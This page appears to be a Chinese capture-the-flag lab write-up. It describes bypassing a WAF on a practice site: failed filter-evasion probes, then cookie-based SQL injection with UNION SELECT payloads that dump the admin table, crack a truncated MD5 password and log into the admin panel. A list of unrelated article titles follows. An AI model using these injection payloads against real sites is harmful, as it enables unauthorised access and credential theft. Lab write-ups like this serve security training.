当前位置: 首页 > news >正文

第二章:遇到阻难!绕过WAF过滤!

初始页面:http://g8wepfcp.ia.aqlab.cn/
image
随机查看新闻动态,进入后的URL:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170
image
判断是否存在注入点:
http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170'
image
被拦截了。
尝试and 1=1也被拦截。
尝试order by,爆出字段为10。
尝试注释绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'/*(s13*/,被拦截了。
尝试内联绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171/*!40000'*/,被拦截了。
尝试双写绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'',被拦截了。
网页防护一般只拦截Get、post传参,尝试将测试语句放到cookie里面,再发送给服务器:
image
页面能正常显示,说明Cookie传参有效,被当作sql语句拼接了。
尝试通过Cookie注入:
cookie值:id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin【from admin的来源不清楚,相关资料直接给出,使用其他表的表名均会爆数据库错误】
image
爆出回显点有:2,3,7,8,9。
爆用户名和密码:admin/b9a2a2b5dffb918c
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
解码密码:b9a2a2b5dffb918c-->welcome【加密是MD5的16位截断】
进入后台http://g8wepfcp.ia.aqlab.cn/admin/【后台地址一般是在url后接/admin】
输入账号密码:admin/welcome。
image
登录成功后拿到Flag。
image

http://www.rkmt.cn/news/176695.html

相关文章:

  • PyTorch-CUDA-v2.7镜像中生成API文档的Swagger集成方法
  • Figma不支持本地部署?国内企业如何选UI设计工具(附方案对比)
  • PyTorch-CUDA-v2.7镜像中联合高校开展AI教学合作
  • PyTorch-CUDA-v2.7镜像中集成Sentry捕获线上异常
  • 大数据领域分布式计算的分布式性能调优工具
  • PyTorch-CUDA-v2.7镜像中内置Weights Biases实现实验追踪
  • Java毕设选题推荐:基于vue的球赛购票系统设计基于SpringBoot+vue的球赛购票系统足球、篮球、排球等各类球赛的门票销售与管理【附源码、mysql、文档、调试+代码讲解+全bao等】
  • PyTorch-CUDA-v2.7镜像中生成订单记录的数据库设计思路
  • PyTorch-CUDA-v2.7镜像中实现数据最小化采集原则
  • postgresql存储过程如何写
  • PyTorch-CUDA-v2.7镜像中调试模型的技巧:pdb与print组合使用
  • 巨型模型训练的近乎线性扩展技术
  • PyTorch-CUDA-v2.7镜像中提供uptime监控页面展示服务状态
  • 开关电源-Buck电路关键设计参数
  • gorm如何调存储过程postgresql
  • PyTorch-CUDA-v2.7镜像中备份数据库的自动化脚本编写
  • 计算机毕业设计260—基于Springboot+Vue3+Ai对话的非遗传承管理系统(源代码+数据库+2万字论文)
  • PyTorch-CUDA-v2.7镜像中运行BERT模型的完整示例
  • PyTorch-CUDA-v2.7镜像中运行LLaMA-3模型的适配方案
  • PyTorch-CUDA-v2.7镜像中实现蓝绿部署减少服务中断时间
  • springboot欢迪迈手机商城设计与开发(11614)
  • PyTorch-CUDA-v2.7镜像中导出模型为TorchScript的方法
  • 深度学习实验室部署方案:批量分发PyTorch-CUDA-v2.7镜像
  • springboot英语知识应用网站的设计与实现(11611)
  • PyTorch-CUDA-v2.7镜像中实现个性化推荐提升用户粘性
  • PyTorch-CUDA-v2.7镜像内运行Flask服务的可行性分析
  • 【计算机毕业设计案例】基于SpringBoot+Vue的宠物成长监管服务平台设计与实现基于SpringBoot的宠物成长监管系统的设计与实现(程序+文档+讲解+定制)
  • 技术团队的人才系统:如何像设计架构一样,设计人才的涌现与传承?
  • 基于知识图谱的大规模推理系统优化技术
  • 技术管理者的时间悖论:为何你越努力,团队越受限?